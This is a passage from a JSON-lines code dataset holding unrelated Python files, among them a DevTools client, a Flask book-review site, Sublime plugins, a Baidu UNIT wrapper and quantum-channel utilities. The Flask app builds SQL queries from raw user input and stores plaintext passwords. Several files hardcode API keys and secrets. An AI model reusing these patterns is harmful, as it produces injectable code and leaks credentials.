pass\n return byte_count\n\nclass DevToolsClient(WebSocketClient):\n \"\"\"DevTools Websocket client\"\"\"\n def __init__(self, url, protocols=None, extensions=None, heartbeat_freq=None,\n ssl_options=None, headers=None):\n WebSocketClient.__init__(self, url, protocols, extensions, heartbeat_freq,\n ssl_options, headers)\n self.connected = False\n self.messages = Queue.Queue()\n self.trace_file_path = None\n self.trace_file = None\n self.video_prefix = None\n self.trace_ts_start = None\n self.trace_data = re.compile(r'method\"\\s*:\\s*\"Tracing.dataCollected')\n self.trace_done = re.compile(r'method\"\\s*:\\s*\"Tracing.tracingComplete')\n\n def opened(self):\n \"\"\"Websocket interface - connection opened\"\"\"\n logging.debug(\"DevTools websocket connected\")\n self.connected = True\n\n def closed(self, code, reason=None):\n \"\"\"Websocket interface - connection closed\"\"\"\n logging.debug(\"DevTools websocket disconnected\")\n self.connected = False\n\n def received_message(self, raw):\n \"\"\"Websocket interface - message received\"\"\"\n try:\n if raw.is_text:\n message = raw.data.decode(raw.encoding) if raw.encoding is not None else raw.data\n compare = message[:50]\n is_trace_data = False\n if self.trace_file_path is not None and self.trace_data.search(compare):\n is_trace_data = True\n msg = json.loads(message)\n self.messages.put('{\"method\":\"got_message\"}')\n if msg is not None:\n self.process_trace_event(msg)\n elif self.trace_file is not None and self.trace_done.search(compare):\n self.trace_file.write(\"\\n]}\")\n self.trace_file.close()\n self.trace_file = None\n if not is_trace_data:\n self.messages.put(message)\n except Exception:\n pass\n\n def get_message(self, timeout):\n \"\"\"Wait for and return a message from the queue\"\"\"\n message = None\n try:\n if timeout is None or timeout <= 0:\n message = self.messages.get_nowait()\n else:\n message = self.messages.get(True, timeout)\n self.messages.task_done()\n except Exception:\n pass\n return message\n\n def start_processing_trace(self, trace_file, video_prefix):\n \"\"\"Write any trace events to the given file\"\"\"\n self.trace_ts_start = None\n self.trace_file_path = trace_file\n self.video_prefix = video_prefix\n\n def stop_processing_trace(self):\n \"\"\"All done\"\"\"\n self.trace_ts_start = None\n self.trace_file_path = None\n if self.trace_file is not None:\n self.trace_file.close()\n self.trace_file = None\n\n def process_trace_event(self, msg):\n \"\"\"Process Tracing.* dev tools events\"\"\"\n if 'params' in msg and 'value' in msg['params'] and len(msg['params']['value']):\n if self.trace_file is None:\n self.trace_file = open(self.trace_file_path, 'wb')\n self.trace_file.write('{\"traceEvents\":[{}')\n # write out the trace events one-per-line but pull out any\n # devtools screenshots as separate files.\n if self.trace_file is not None:\n trace_events = msg['params']['value']\n for _, trace_event in enumerate(trace_events):\n is_screenshot = False\n if self.video_prefix is not None and 'cat' in trace_event and \\\n 'name' in trace_event and 'ts' in trace_event:\n if self.trace_ts_start is None and \\\n trace_event['name'] == 'navigationStart' and \\\n trace_event['cat'].find('blink.user_timing') > -1:\n self.trace_ts_start = trace_event['ts']\n if trace_event['name'] == 'Screenshot' and \\\n trace_event['cat'].find('devtools.screenshot') > -1:\n is_screenshot = True\n if self.trace_ts_start is not None and \\\n 'args' in trace_event and \\\n 'snapshot' in trace_event['args']:\n ms_elapsed = 
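The frame-naming arithmetic in process_trace_event() — trace timestamps are microseconds, so elapsed milliseconds are (ts - ts_start) / 1000, rounded — as a standalone sketch (frame_name and the sample values are hypothetical):

def frame_name(prefix, ts, ts_start):
    ms_elapsed = int(round((ts - ts_start) / 1000.0))
    # Negative offsets mean the event predates navigationStart; skip those
    return '{0}{1:06d}.png'.format(prefix, ms_elapsed) if ms_elapsed >= 0 else None

assert frame_name('video_', 1500000, 0) == 'video_001500.png'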
int(round(float(trace_event['ts'] - \\\n self.trace_ts_start) / 1000.0))\n if ms_elapsed >= 0:\n path = '{0}{1:06d}.png'.format(self.video_prefix, ms_elapsed)\n with open(path, 'wb') as image_file:\n image_file.write(\n base64.b64decode(trace_event['args']['snapshot']))\n if not is_screenshot:\n self.trace_file.write(\",\\n\")\n self.trace_file.write(json.dumps(trace_event))\n logging.debug(\"Processed %d trace events\", len(msg['params']['value']))\n","sub_path":"internal/devtools.py","file_name":"devtools.py","file_ext":"py","file_size_in_byte":40775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"203934243","text":"import os\nimport requests\n\nfrom flask import Flask, session, render_template, request, jsonify\nfrom flask_session import Session\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\n\napp = Flask(__name__)\n\n# Check for environment variable\nif not os.getenv(\"DATABASE_URL\"):\n raise RuntimeError(\"DATABASE_URL is not set\")\n\n# Configure session to use filesystem\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\nSession(app)\n\n# Set up database\nengine = create_engine(os.getenv(\"DATABASE_URL\"))\ndb = scoped_session(sessionmaker(bind=engine))\n\n\n@app.route(\"/\", methods = [\"GET\"])\ndef index():\n return render_template(\"index.html\")\n\n@app.route(\"/register\", methods = [\"GET\", \"POST\"])\ndef register():\n if request.method == \"GET\":\n return render_template(\"register.html\")\n elif request.method == \"POST\":\n \"\"\"Register to the website\"\"\"\n # Get form information.\n name = request.form.get(\"name\").capitalize()\n pw = request.form.get(\"pw\")\n email = request.form.get(\"email\")\n # Make sure the username is unique.\n if db.execute(\"SELECT * FROM users WHERE name = :name\", {\"name\":name}).rowcount == 0:\n db.execute(\"INSERT INTO users (name, email, password) VALUES (:name, :email, :password)\", {\"name\":name, \"email\":email, \"password\":pw})\n db.commit()\n return render_template(\"success.html\", message=\"You've succesfully created your account.\")\n return render_template(\"error.html\", message=\"Please choose a different username.\")\n\n@app.route(\"/login\", methods = [\"GET\", \"POST\"])\ndef login():\n if request.method == \"GET\":\n return render_template(\"login.html\")\n elif request.method == \"POST\":\n name = request.form.get(\"name\").capitalize()\n pw = request.form.get(\"pw\")\n if db.execute(\"SELECT * FROM users WHERE name = :name AND password = :password\", {\"name\":name, \"password\":pw}).rowcount != 0:\n session[\"username\"] = name\n return render_template(\"search.html\")\n return render_template(\"error.html\", message=\"Incorrect Username And/Or Password.\")\n\n@app.route(\"/dashboard\", methods=[\"GET\"])\ndef dashboard():\n return render_template(\"search.html\")\n\n@app.route(\"/logout\")\ndef logout():\n session[\"username\"] = None\n return render_template(\"success.html\", message=\"You've successfully logged out.\")\n\n@app.route(\"/results\", methods = [\"GET\", \"POST\"])\ndef results():\n searchFor = request.form.get(\"userInput\").title()\n data = db.execute(\"SELECT isbn, title, author FROM books WHERE isbn LIKE '%{}%' OR title LIKE '%{}%' OR author LIKE'%{}%' LIMIT 5\".format(searchFor, searchFor,searchFor)).fetchall()\n\n if data == []:\n return render_template(\"error.html\", message=\"Couldn't find anything :(\")\n return 
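The /results query above interpolates raw user input with str.format(), which is open to SQL injection. A safer sketch of the same search using a bound parameter (same names and db.execute style as the register/login handlers above):

pattern = "%{}%".format(searchFor)
data = db.execute(
    "SELECT isbn, title, author FROM books "
    "WHERE isbn LIKE :p OR title LIKE :p OR author LIKE :p LIMIT 5",
    {"p": pattern},
).fetchall()

The string-formatted queries in the /books route would benefit from the same treatment.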
render_template(\"results.html\", data = data)\n\n@app.route(\"/books/\", methods = [\"GET\", \"POST\"])\ndef books(isbn):\n root = request.script_root\n isbn += root\n book_info = db.execute(\"SELECT isbn, title, author, year FROM books WHERE isbn = '{}'\".format(isbn)).fetchall()\n reviews = db.execute(\"SELECT rating, review, name FROM reviews WHERE isbn = '{}'\".format(isbn)).fetchall()\n\n res = requests.get(\"https://www.goodreads.com/book/review_counts.json\", params={\"key\": \"f7ZWmLq8xqWyHrFkqcd0Q\", \"isbns\": f\"{isbn}\"})\n data = res.json()\n avg_rating = data[\"books\"][0][\"average_rating\"]\n rating_count = data[\"books\"][0][\"work_ratings_count\"]\n\n if request.method == \"GET\":\n return render_template(\"books.html\", reviews = reviews, book_info = book_info, isbn = isbn, avg_rating = avg_rating, rating_count = rating_count)\n\n elif request.method == \"POST\":\n name = session.get(\"username\")\n review = request.form.get(\"comment\")\n rating = request.form.get(\"rate\")\n message = \"said:\"\n if db.execute(\"SELECT * FROM reviews WHERE name = :name AND isbn = :isbn\", {\"name\":name, \"isbn\":isbn}).rowcount == 0:\n save_review = db.execute(\"INSERT INTO reviews (rating, review, name, isbn) VALUES (:rating, :review, :name, :isbn)\",{\"rating\":rating, \"review\":review, \"name\":name, \"isbn\":isbn})\n db.commit()\n error_msg = \"\"\n else:\n error_msg = \"You can only submit one review per book.\"\n\n return render_template(\"books.html\", review = review, name = name, rating = rating, isbn = isbn, book_info = book_info, message = message, reviews = reviews, error_msg=error_msg, avg_rating = avg_rating, rating_count = rating_count)\n\n@app.route(\"/api/\", methods = [\"GET\"])\ndef api(isbn):\n isbn = str(isbn)\n book = db.execute(\"SELECT title, author, year, isbn FROM books WHERE isbn = :isbn\", {\"isbn\":isbn})\n reviews = db.execute(\"SELECT COUNT(*) FROM reviews WHERE isbn = :isbn\", {\"isbn\":isbn}).fetchall()\n if book.rowcount == 0:\n return jsonify({\"error\":\"Invalid isbn\"}), 404\n else:\n book = book.fetchall()\n return jsonify({\n \"title\":f\"{book[0][0]}\",\n \"author\":f\"{book[0][1]}\",\n \"year\":f\"{book[0][2]}\",\n \"isbn\":f\"{book[0][3]}\",\n \"review_count\":f\"{reviews[0][0]}\"\n })\n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":5222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"368007568","text":"\"\"\"\n 队列的顺序存储\n 思路:1。基于列表完成数据存储\n 2。通过封装规定数据操作\n\"\"\"\n\n\nclass QueueError(Exception):\n pass\n\n\nclass SQueue:\n def __init__(self):\n self._elems = []\n\n def is_empty(self):\n return self._elems == []\n\n def enqueue(self, val):\n \"\"\"\n 入队\n :param val:\n :return:\n \"\"\"\n self._elems.append(val)\n\n def dequeue(self):\n if not self._elems:\n raise QueueError('empty')\n return self._elems.pop(0)\n\n\nif __name__ == '__main__':\n sq = SQueue()\n sq.enqueue(10)\n sq.enqueue(20)\n sq.enqueue(30)\n \"\"\"\n 经典题目 ,队列反转\n \"\"\"\n from sstack import *\n st=SStack()\n\n while not sq.is_empty():\n st.push(sq.dequeue())\n while not st.is_empty():\n sq.enqueue(st.pop())\n\n while not sq.is_empty():\n print(sq.dequeue())\n","sub_path":"python_study/data_struct/squeue.py","file_name":"squeue.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"273901999","text":"import re\nimport os\nimport sublime\nimport sublime_plugin\n\nfrom 
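squeue.py reverses a queue by draining it into a stack and back. The same idea with the standard library — noting that list.pop(0) in dequeue() is O(n) per call, while collections.deque.popleft() is O(1) (values are illustrative):

from collections import deque

queue = deque([10, 20, 30])
stack = []
while queue:
    stack.append(queue.popleft())   # queue -> stack reverses the order once
while stack:
    queue.append(stack.pop())       # stack -> queue keeps the reversal
assert list(queue) == [30, 20, 10]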
Default.paragraph import expand_to_paragraph\n\n# TODO: Add support for tab and mixed tab-space indents\n\n#------------------------------------------------------------------------------\n#\n# Plugin\n#\n#------------------------------------------------------------------------------\n\n\n#\n# Returns the valid prefix of 's'\n#\ndef match_token(s):\n s = s.lstrip()\n l = len(s)\n for i in range(l):\n # Only check the first two characters\n if i >= 2:\n break\n c = s[i]\n if c == \"-\":\n return c\n if c == \"*\":\n return c\n if c == \">\":\n if i + 1 < l and c == s[i + 1]:\n return \">>\"\n return c\n if c == \"#\":\n return c\n if c == \"/\":\n if i + 1 < l and c == s[i + 1]:\n return \"//\"\n if c == \"~\":\n return c\n return \"\"\n\n#\n# Escapes 't'\n#\ndef escape(t):\n if t == \"*\":\n return \"\\*\"\n return t\n\n#\n# Returns the number of leading spaces in 's'\n#\ndef lspace(s):\n i = 0\n while i < len(s) and s[i] == \" \":\n i += 1\n return i\n\n#\n# Wraps 'stream' at 'cutoff' (including)\n#\ndef wrap_stream(stream, indent=None, newlines=0, cutoff=80):\n if not indent:\n indent = lspace(stream)\n\n prefix = match_token(stream)\n prefix_indent = indent\n\n stream = re.sub('(\\n)+', ' ', stream)\n stream = re.sub('( )+', ' ', stream)\n stream = re.sub('({})'.format(escape(prefix)), '', stream, 1)\n stream = stream.strip()\n\n if (len(prefix) > 0):\n prefix_indent += len(prefix) + 1\n prefix += \" \"\n\n if len(stream) + prefix_indent < cutoff:\n return \" \" * indent + prefix + stream + \"\\n\"\n\n leader = 1\n block = \"\"\n line = \"\"\n linelen = 0\n for word in stream.split():\n if linelen + prefix_indent + len(word) >= cutoff:\n if not leader:\n block += \" \" * prefix_indent + line.rstrip() + \"\\n\"\n else:\n leader = 0\n block += \" \" * indent + prefix + line.rstrip() + \"\\n\"\n line = \"\"\n linelen = 0\n line += word + \" \"\n linelen += len(word) + 1\n block += \" \" * prefix_indent + line.rstrip()\n\n return block + \"\\n\"\n\n\n#------------------------------------------------------------------------------\n#\n# Sublime\n#\n#------------------------------------------------------------------------------\n\n\ndef get_file_ext(view):\n filepath = view.file_name()\n if filepath != None:\n ext = os.path.splitext(view.file_name())[1]\n if len(ext) != 0:\n return ext\n return None\n\ndef get_wrap_width(view):\n wrap_width = view.settings().get(\"wrap_width\")\n if not wrap_width or wrap_width < 10:\n return 80\n return wrap_width\n\nclass WrapBlock(sublime_plugin.TextCommand):\n def run(self, edit):\n view = self.view\n wrap_width = get_wrap_width(view)\n region = view.sel()[0]\n region = expand_to_paragraph(view, region.begin())\n string = wrap_stream(view.substr(region), cutoff=wrap_width)\n view.replace(edit, sublime.Region(region.begin(), region.end()), string)\n","sub_path":"sublime/plugins/hard-wrap.py","file_name":"hard-wrap.py","file_ext":"py","file_size_in_byte":3212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"603442711","text":"#!/usr/bin/env python\n\n# Install dependencies, preferably in a virtualenv:\n#\n# pip install flask matplotlib\n#\n# Run the development server:\n#\n# python app.py\n#\n# Go to http://localhost:5000/plot.png and see a plot of random data.\n#\n# based on https://gist.github.com/rduplain/1641344\n \nimport random\nimport cStringIO\n \nfrom flask import Flask, make_response, request\nfrom matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\nfrom matplotlib.figure 
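For reference, an illustrative call to wrap_stream() from hard-wrap.py: match_token() detects the '//' prefix, wrap_stream() strips it, wraps the words, and re-applies it with continuation indent (the input string is made up; the expected output below was traced by hand and may differ in edge cases):

text = "  // lorem ipsum dolor sit amet consectetur adipiscing elit"
print(wrap_stream(text, cutoff=30))
# Expected shape:
#   // lorem ipsum dolor sit
#      amet consectetur
#      adipiscing elit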
import Figure\n \n \napp = Flask(__name__)\n\n\n@app.route('/')\ndef root() :\n return \"
\"\n\n@app.route('/plot.png', methods = ['GET', 'POST'])\ndef plot() :\n fig = Figure()\n axis = fig.add_subplot(1, 1, 1)\n \n if request.method == 'GET' :\n xs = range(100)\n ys = [random.randint(1, 50) for x in xs]\n \n if request.method == 'POST' :\n # assuming posted data looks like '3.3,5.3,6.13,33.4'\n ys = map( float, request.form['data'].strip().split(',') )\n xs = range(len(ys))\n\n axis.plot(xs, ys)\n canvas = FigureCanvas(fig)\n output = cStringIO.StringIO()\n canvas.print_png(output)\n response = make_response(output.getvalue())\n response.mimetype = 'image/png'\n return response\n\n \nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"flaskdemo.py","file_name":"flaskdemo.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"183645137","text":"'''\ncalcular valor a ser pago por um produto com as condições abaixo:\n- a vista dinheiro/cheque 10% desconto\n- a vista cartao 5%\n- em até 2x cartão preço normal\n- 3x ou mais 20% juros\n'''\n\nvalor = float(input('Digite o valor do produto: '))\nprint('''==== Escolha uma das seguintes opções de pagamento ====\nA VISTA DINHEIRO/CHEQUE: digite 1\nA VISTA NO CARTÃO: digite 2\nParcelar em 2x no cartão: Digite 3\nPara parcelar em 3x: Digite 4''')\nopcao = int(input('Digite a opção: '))\nvalorfinal = 0\n\nif opcao == 1:\n valorfinal = valor - (valor * 10 / 100)\nelif opcao == 2:\n valorfinal = valor - (valor * 5 / 100)\nelif opcao == 3:\n valorfinal = valor\nelse:\n valorfinal = valor + (valor * 20 / 100)\n\nprint('O valor final do produto será de: R$ {}'.format(valorfinal))","sub_path":"Curso em Vídeo/exercicios/ex044.py","file_name":"ex044.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"162219831","text":"#!/bin/env python\n\nimport utils\n\ndataset = 'datacommons_feeds'\nsubfolder_path = utils.data_location / 'datacommons_feeds'\ninput_file = subfolder_path / 'source' / 'data.json'\n\ndata = utils.read_json(input_file)\n\nresults = [{'url': el['url'], 'label': 'true', 'source': 'datacommons_feeds'} for el in data['dataFeedElement']]\n\nutils.write_json_with_path(results, subfolder_path, 'urls.json')\n\nby_domain = utils.compute_by_domain(results)\n\nutils.write_json_with_path(by_domain, subfolder_path, 'domains.json')\n","sub_path":"datacommons_feeds.py","file_name":"datacommons_feeds.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"239888931","text":"# Problem 7\n#\n# By listing the first six prime numbers: 2, 3, 5, 7, 11, and 13, we can see\n# that the 6th prime is 13.\n#\n# What is the 10,001st prime number?\n\n# brute force with some small optimizations such as using the primes given in\n# the problem and skipping even numbers\ndef solution1():\n primes = [3, 5, 7, 11, 13]\n n = 17\n for i in range(10001 - len(primes) + 1):\n while any(n % p == 0 for p in primes):\n n += 2 \n primes.append(n)\n return n \n \n# just cheese it and guess using a prime sieve\nfrom eulerlib import sieve_of_eratosthenes\ndef solution2():\n return sieve_of_eratosthenes(1000000)[10000]\n\nprint(solution2())\n","sub_path":"Python/p007.py","file_name":"p007.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"104783479","text":"# -*- coding: utf-8 
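flaskdemo.py is Python 2 code (cStringIO, a list-returning map). A Python 3 sketch of the same PNG response built around io.BytesIO (render_png is a hypothetical helper; the Flask and Matplotlib calls are the ones used above):

import io
from flask import make_response
from matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas
from matplotlib.figure import Figure

def render_png(xs, ys):
    fig = Figure()
    axis = fig.add_subplot(1, 1, 1)
    axis.plot(xs, ys)
    output = io.BytesIO()                 # BytesIO replaces cStringIO.StringIO
    FigureCanvas(fig).print_png(output)
    response = make_response(output.getvalue())
    response.mimetype = 'image/png'
    return response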
-*-\n\n\"\"\"\nShift Tab\n\nPlugin for Sublime Text to shift a tab left or right\n\nCopyright (c) 2015 Wendell Noordhof\n\nInspired by Move Tab by Frédéric Massart - FMCorz.net\nhttp://github.com/FMCorz/MoveTab\n\"\"\"\n\nimport sublime, sublime_plugin\n\nclass ShiftTabCommand(sublime_plugin.WindowCommand):\n\tdef run(self, direction):\n\t\tview = self.window.active_view()\n\t\tcurrent_pos = self.window.get_view_index(view)\n\t\tif current_pos == -1:\n\t\t\treturn\n\t\tgroup, index = current_pos\n\n\t\tif direction == \"left\":\n\t\t\tindex = index - 1\n\t\telif direction == \"right\":\n\t\t\tindex = index + 1\n\t\telse:\n\t\t\tprint(\"%s: Invalid direction: '%s'\" % (self.__class__.__name__, direction))\n\t\t\treturn\n\n\t\tif index < 0:\n\t\t\tif group > 0:\n\t\t\t\tgroup, index = group-1, len(self.window.views_in_group(group-1))\n\t\t\telse:\n\t\t\t\treturn\n\t\telif index > len(self.window.views_in_group(group)) - 1:\n\t\t\tif group < self.window.num_groups() - 1:\n\t\t\t\tgroup, index = group+1, 0\n\t\t\telse:\n\t\t\t\treturn\n\n\t\tself.window.set_view_index(view, group, index)\n\t\tself.window.focus_view(view)\n","sub_path":"shift_tab.py","file_name":"shift_tab.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"256476348","text":"def gcd(p, q):\n while p and q:\n p, q = q, p%q\n return p + q\n\nn = int(input())\nfor i in range(n):\n p = round(10000*float(input()))\n q = 10000\n print(q//gcd(p, q))\n","sub_path":"games.py","file_name":"games.py","file_ext":"py","file_size_in_byte":184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"176387921","text":"# For team submissions:\n# By submitting this assignment, all team members agree to the following:\n# “Aggies do not lie, cheat, or steal, or tolerate those who do”\n# “I have not given or received any unauthorized aid on this assignment”\n#\n# Names: NAME OF TEAM MEMBER 1\n# NAME OF TEAM MEMBER 2\n# NAME OF TEAM MEMBER 3\n# NAME OF TEAM MEMBER 4\n# Course/Section: ENGR 102-216\n# Assignment: THE ASSIGNMENT NUMBER\n# Date: DAY MONTH YEAR\n\ninp = open('Celsius.dat', 'r')\nout = open(\"Fahrenheit.dat\", 'w')\nx = inp.read()\n\nfor i in x.split('\\n'):\n if i.isnumeric():\n f = (float(i) * 9 / 5) + 32\n out.write(str(f) + '\\n')\n\ninp.close()\nout.close()\n\n","sub_path":"Week 9/Lab9_Act1.py","file_name":"Lab9_Act1.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"236880244","text":"with open('surfin.txt') as file:\n rows, cols = (int(i) for i in file.readline().split())\n crowd = [i.strip() for i in file]\n\n\ndef step(coords):\n xPos, yPos = coords\n if yPos - 1 >= 0:\n if crowd[xPos][yPos - 1] == '>':\n yield [xPos, yPos - 1]\n if xPos - 1 >= 0:\n if crowd[xPos - 1][yPos] == 'v':\n yield [xPos - 1, yPos]\n\nanswer = 0\nqueue = [[rows - 1, cols - 1]]\nwhile queue:\n for i in step(queue.pop()):\n queue.append(i)\n answer += 1\n\nanswer = rows * cols - (answer + 1)\nwith open('surfout.txt', 'w') as file:\n file.write(str(answer))\n","sub_path":"AIOC/AIC&AIO/2008/Crowd Surfing/crowd.py","file_name":"crowd.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"638153418","text":"import ast\nfrom django.conf import settings\nfrom notifier.event_handler.event import Event\n\n\nclass 
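games.py reduces p/10000 with a hand-rolled gcd and prints the reduced denominator. The standard library performs the same reduction directly (illustrative value):

from fractions import Fraction

p = round(10000 * 0.25)                    # 0.25 -> 2500
print(Fraction(p, 10000).denominator)      # 4, the same as q // gcd(p, q)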
ETLJobsLinksEvent(Event):\n def __init__(self, job_notifier, request_id, etl_jobs):\n self.job_notifier = job_notifier\n self.request_id = request_id\n self.etl_jobs = etl_jobs\n\n @classmethod\n def get_type(cls):\n return \"ETLJobsLinksEvent\"\n\n @classmethod\n def get_method(cls):\n return \"process_etl_jobs_links_event\"\n\n def translate_status(self, code=None, message=\"\"):\n if code:\n if code == 101:\n return \"DATA_SOURCE_ERROR\"\n elif code == 102:\n return \"NO_DATA\"\n elif code == 103:\n return \"ERROR\"\n return message\n\n def get_message(self, message):\n try:\n return message.get(\"message\")\n except Exception as e:\n pass\n return message\n\n def __str__(self):\n ETL_COMMENT_MESSAGE_TEMPLATE = \"\"\"\n ETLJobs:\n | TYPE | SAMPLE ID | STATUS | MESSAGE |\n {etl_jobs}\n \"\"\"\n etl_jobs = \"\"\n for j in self.etl_jobs:\n etl_jobs += \"| %s | %s | %s | %s |\\n\" % (\n j[\"type\"],\n j[\"sample\"],\n self.translate_status(code=j[\"code\"], message=j[\"status\"]),\n j[\"message\"],\n )\n return ETL_COMMENT_MESSAGE_TEMPLATE.format(etl_jobs=etl_jobs)\n","sub_path":"notifier/events/etl_jobs_links_event.py","file_name":"etl_jobs_links_event.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"559205945","text":"# coding:utf-8\r\n'''\r\nCreated on 2017年7月15日\r\n\r\n@author: Administrator\r\n'''\r\nfrom utils.http_request import HttpRequest\r\nimport json\r\n\r\n\r\nclass BaiduUnit(object):\r\n '''\r\n 百度UNIT请求封装\r\n '''\r\n\r\n def __init__(self):\r\n '''\r\n Constructor\r\n '''\r\n # token获取(使用应用名称为:“商品导购”)\r\n self.token_request = HttpRequest(\"https://aip.baidubce.com/oauth/2.0/token\")\r\n self.key_grant_type = \"grant_type\"\r\n self.val_grant_type = \"client_credentials\";\r\n self.key_client_id = \"client_id\"\r\n self.val_client_id = \"CwMUqtG0PlTtwExfLbeBr7qV\"\r\n self.key_client_secret = \"client_secret\"\r\n self.val_client_secret = \"kZiWVLLjkXo3DOSB8nEglsjgmmyaLFOr\"\r\n\r\n # token(30th-September-2017)\r\n self.val_token = \"24.e79e25f689fabcc17f3ed51cac325407.2592000.1509334723.282335-10028417\"\r\n\r\n self.unit_requet = HttpRequest(\r\n \"https://aip.baidubce.com/rpc/2.0/solution/v1/unit_utterance?access_token=\" + self.val_token)\r\n\r\n def get_token(self):\r\n '''\r\n 获取临时token\r\n '''\r\n data = {self.key_grant_type: self.val_grant_type, \\\r\n self.key_client_id: self.val_client_id, \\\r\n self.key_client_secret: self.val_client_secret}\r\n res = self.token_request.get(params=data).text\r\n res_dic = json.loads(res)\r\n if (res_dic.has_key(\"access_token\")):\r\n return res_dic[\"access_token\"]\r\n else:\r\n return None\r\n\r\n def query_request(self, scene_id, query, session_id):\r\n '''\r\n 用户query请求\r\n scene_id:场景ID\r\n query:用户query\r\n session_id:session ID\r\n 返回值:UNIT返回结果\r\n '''\r\n data = {\"scene_id\": scene_id, \\\r\n \"query\": query, \\\r\n \"session_id\": session_id}\r\n\r\n return self.unit_requet.post(json.dumps(data))\r\n","sub_path":"src/baiduunit/baidu_unit.py","file_name":"baidu_unit.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"310140070","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 15 10:10:57 2018\n\n@author: Jarnd\n\"\"\"\n\n\"\"\"\nCreated on Tue Oct 9 16:35:42 2018\n\n@author: Jarnd\n\"\"\"\nimport numpy as np\nimport itertools as itt\nfrom functools import reduce\nimport operator as op\n\n#%%\nsq2 = np.sqrt(2)\n\nI 
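baidu_unit.py calls res_dic.has_key(...), which only exists in Python 2; under Python 3 the membership test is spelled with `in` (payload values are made up):

res_dic = {"access_token": "tok-123", "expires_in": 2592000}
token = res_dic["access_token"] if "access_token" in res_dic else None
# or, equivalently:
token = res_dic.get("access_token")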
= np.mat([[1, 0], [0, 1]],dtype='complex')\nX = np.mat([[0, 1], [1, 0]],dtype='complex')\nY = 1j*np.mat([[0, -1], [1, 0]],dtype='complex')\nZ = np.mat([[1, 0], [0, -1]],dtype='complex')\nII = np.kron(I,I)\n\npaulis_1 = [I,X,Y,Z]\n\n\n#%%\ndef get_pauli_basis(n, normalise=True):\n \"\"\"\n Lists the Pauli matrices that form a basis for the space of\n operators on `n` qubits.\n \"\"\"\n basis = [_ / sq2 for _ in paulis_1] if normalise else paulis_1\n \n P2 = []\n for Bde in itt.product(basis, repeat=n):\n P2.append(reduce(np.kron, Bde))\n return P2\n\ndef get_pauli_names(n):\n p1names = ['I', 'X', 'Y', 'Z']\n pnames = []\n for p in itt.product(p1names, repeat=n):\n pnames.append(reduce(op.add, p))\n return pnames\n\ndef get_decomp(U,bas,n):\n \"\"\"\n Get the decomposition of unitary U into a basis specified by bas\n Returns a string of length 2^(2n) with the ith entry the weight of the ith matrix in bas\n \"\"\"\n weights = np.zeros(len(bas),dtype = 'complex')\n for i,mat in enumerate(bas):\n weights[i] = np.trace(mat.conj().T*U)/np.trace(mat.conj().T*mat)\n return np.mat(weights)\n\ndef get_paulidecomp(U,n,normalisation = False):\n \"\"\"\n Get the decomposition of unitary U into the pauli basis.\n Returns a string of length 2^(2n) with the ith entry the weight of the ith pauli\n \"\"\"\n P = get_pauli_basis(n, normalise = normalisation)\n weights = np.zeros(len(P),dtype = 'complex')\n for i,pauli in enumerate(P):\n weights[i] = np.trace(pauli*U)/np.trace(pauli*pauli)\n return np.mat(weights)\n\ndef U_to_chi(U,n, normalisation):\n weights = get_paulidecomp(U,n, normalisation)\n return np.matmul(weights.conj().T, weights)\n\ndef get_chi_dep(p,n, normalized=False):\n d4 = 2**(2*n)\n supp = np.ones(d4,dtype='complex')*p*(1/(d4-1))\n supp[0] = 1-p\n return np.mat(np.diag(supp))*(2**n) if normalized else np.mat(np.diag(supp))\n\ndef left_ext_chi(chi,n,bas=None, normalise = False):\n if bas == None:\n bas = get_pauli_basis(1,normalise)\n I = np.eye(2**1)\n weights = get_decomp(I,bas,1)\n chi_I = np.matmul(weights.T, weights)\n return np.kron(chi_I,chi)\n\ndef right_ext_chi(chi,n,bas=None,normalise = False):\n if bas == None:\n bas = get_pauli_basis(1,normalise)\n I = np.eye(2**1)\n weights = get_decomp(I,bas,1)\n chi_I = np.matmul(weights.T, weights)\n return np.kron(chi,chi_I)\n\ndef get_supersuper_from_chi(chi,bas,n):\n SS = np.zeros((2**(2*n),2**(2*n)),dtype = 'complex')\n for Bm, Bn in itt.product(enumerate(bas),repeat = 2):\n SS += np.kron(chi[Bm[0],Bn[0]],np.kron(Bn[1].conj(),Bm[1]))\n return np.mat(SS)\n\ndef get_chi_from_supersuper(SS,bas,n):\n chi = np.zeros((2**(2*n),2**(2*n)),dtype = 'complex')\n for Bm, Bn in itt.product(enumerate(bas),repeat = 2):\n basvect = 